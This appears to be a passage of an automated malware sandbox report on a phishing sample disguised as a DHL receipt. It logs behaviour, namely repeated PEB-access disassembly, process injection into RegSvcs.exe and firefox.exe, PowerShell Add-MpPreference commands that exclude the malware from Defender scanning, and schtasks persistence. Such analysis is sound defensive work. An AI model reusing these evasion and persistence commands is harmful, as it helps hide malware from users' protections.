                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0179678E mov eax, dword ptr fs:[00000030h]8_2_0179678E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01722674 mov eax, dword ptr fs:[00000030h]8_2_01722674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172A660 mov eax, dword ptr fs:[00000030h]8_2_0172A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172A660 mov eax, dword ptr fs:[00000030h]8_2_0172A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017B866E mov eax, dword ptr fs:[00000030h]8_2_017B866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017B866E mov eax, dword ptr fs:[00000030h]8_2_017B866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0170C640 mov eax, dword ptr fs:[00000030h]8_2_0170C640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F262C mov eax, dword ptr fs:[00000030h]8_2_016F262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01726620 mov eax, dword ptr fs:[00000030h]8_2_01726620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01728620 mov eax, dword ptr fs:[00000030h]8_2_01728620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0170E627 mov eax, dword ptr fs:[00000030h]8_2_0170E627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01732619 mov eax, dword ptr fs:[00000030h]8_2_01732619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0170260B mov eax, dword ptr fs:[00000030h]8_2_0170260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0170260B mov eax, dword ptr fs:[00000030h]8_2_0170260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0170260B mov eax, dword ptr fs:[00000030h]8_2_0170260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0170260B mov eax, dword ptr fs:[00000030h]8_2_0170260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0170260B mov eax, dword ptr fs:[00000030h]8_2_0170260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0170260B mov eax, dword ptr fs:[00000030h]8_2_0170260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0170260B mov eax, dword ptr fs:[00000030h]8_2_0170260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176E609 mov eax, dword ptr fs:[00000030h]8_2_0176E609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176E6F2 mov eax, dword ptr fs:[00000030h]8_2_0176E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176E6F2 mov eax, dword ptr fs:[00000030h]8_2_0176E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176E6F2 mov eax, dword ptr fs:[00000030h]8_2_0176E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176E6F2 mov eax, dword ptr fs:[00000030h]8_2_0176E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017706F1 mov eax, dword ptr fs:[00000030h]8_2_017706F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017706F1 mov eax, dword ptr fs:[00000030h]8_2_017706F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172A6C7 mov ebx, dword ptr fs:[00000030h]8_2_0172A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172A6C7 mov eax, dword ptr fs:[00000030h]8_2_0172A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017266B0 mov eax, dword ptr fs:[00000030h]8_2_017266B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0172C6A6 mov eax, dword ptr fs:[00000030h]8_2_0172C6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F4690 mov eax, dword ptr fs:[00000030h]8_2_016F4690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016F4690 mov eax, dword ptr fs:[00000030h]8_2_016F4690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01794978 mov eax, dword ptr fs:[00000030h]8_2_01794978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01794978 mov eax, dword ptr fs:[00000030h]8_2_01794978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177C97C mov eax, dword ptr fs:[00000030h]8_2_0177C97C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01716962 mov eax, dword ptr fs:[00000030h]8_2_01716962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01716962 mov eax, dword ptr fs:[00000030h]8_2_01716962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01716962 mov eax, dword ptr fs:[00000030h]8_2_01716962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0173096E mov eax, dword ptr fs:[00000030h]8_2_0173096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0173096E mov edx, dword ptr fs:[00000030h]8_2_0173096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0173096E mov eax, dword ptr fs:[00000030h]8_2_0173096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01770946 mov eax, dword ptr fs:[00000030h]8_2_01770946
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0178892B mov eax, dword ptr fs:[00000030h]8_2_0178892B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177892A mov eax, dword ptr fs:[00000030h]8_2_0177892A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0177C912 mov eax, dword ptr fs:[00000030h]8_2_0177C912
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016E8918 mov eax, dword ptr fs:[00000030h]8_2_016E8918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016E8918 mov eax, dword ptr fs:[00000030h]8_2_016E8918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176E908 mov eax, dword ptr fs:[00000030h]8_2_0176E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0176E908 mov eax, dword ptr fs:[00000030h]8_2_0176E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017229F9 mov eax, dword ptr fs:[00000030h]8_2_017229F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_017229F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0177E9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_017249D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_017BA9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_017869C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016FA9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016F09AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_017789B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_017789B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_017029A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0177E872 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01786870 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01720854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01702840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016F4859 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0172A830 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0179483A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01712835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01712835 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0177C810 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0172C8F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_017BA8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0171E8C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016F0887 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0177C89D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016ECB7E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0179EB50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_017A4B4B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01786B40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_017BAB40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01798B42 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0171EB20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_017B8B28 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0176EB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0177CBF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0171EBFC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016F8BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016F0BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0179EBD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01710BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_017A4BB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01700BBE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0176CA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0179EA60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0172CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01700A5B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016F6A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01714A35 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0172CA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0171EA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0177CA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0172AAEE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01724AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01746ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016F0AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016F8AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01746AA4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01728A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016FEA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_017C4A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01788D6B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016F0D59 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_016F8D59 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe"
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtSetInformationThread: Direct from: 0x76F02B4C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtSetInformationThread: Direct from: 0x76EF63F9
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtTerminateThread: Direct from: 0x76F02FCC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtMapViewOfSection: Direct from: 0x76F02D1C
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtResumeThread: Direct from: 0x76F036AC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtReadFile: Direct from: 0x76F02ADC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtDelayExecution: Direct from: 0x76F02DDC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtQueryInformationProcess: Direct from: 0x76F02C26
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtResumeThread: Direct from: 0x76F02FBC
                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe NtCreateUserProcess: Direct from: 0x76F0371C
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe protection: execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Windows\SysWOW64\EhStorAuthn.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: NULL target: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe protection: read write
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: NULL target: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Thread register set: target process: 8136
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Thread APC queued: target process: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: C8A008
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1174008
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmp99C5.tmp"
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AYBPplggzXaXav" /XML "C:\Users\user\AppData\Local\Temp\tmpC3B4.tmp"
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
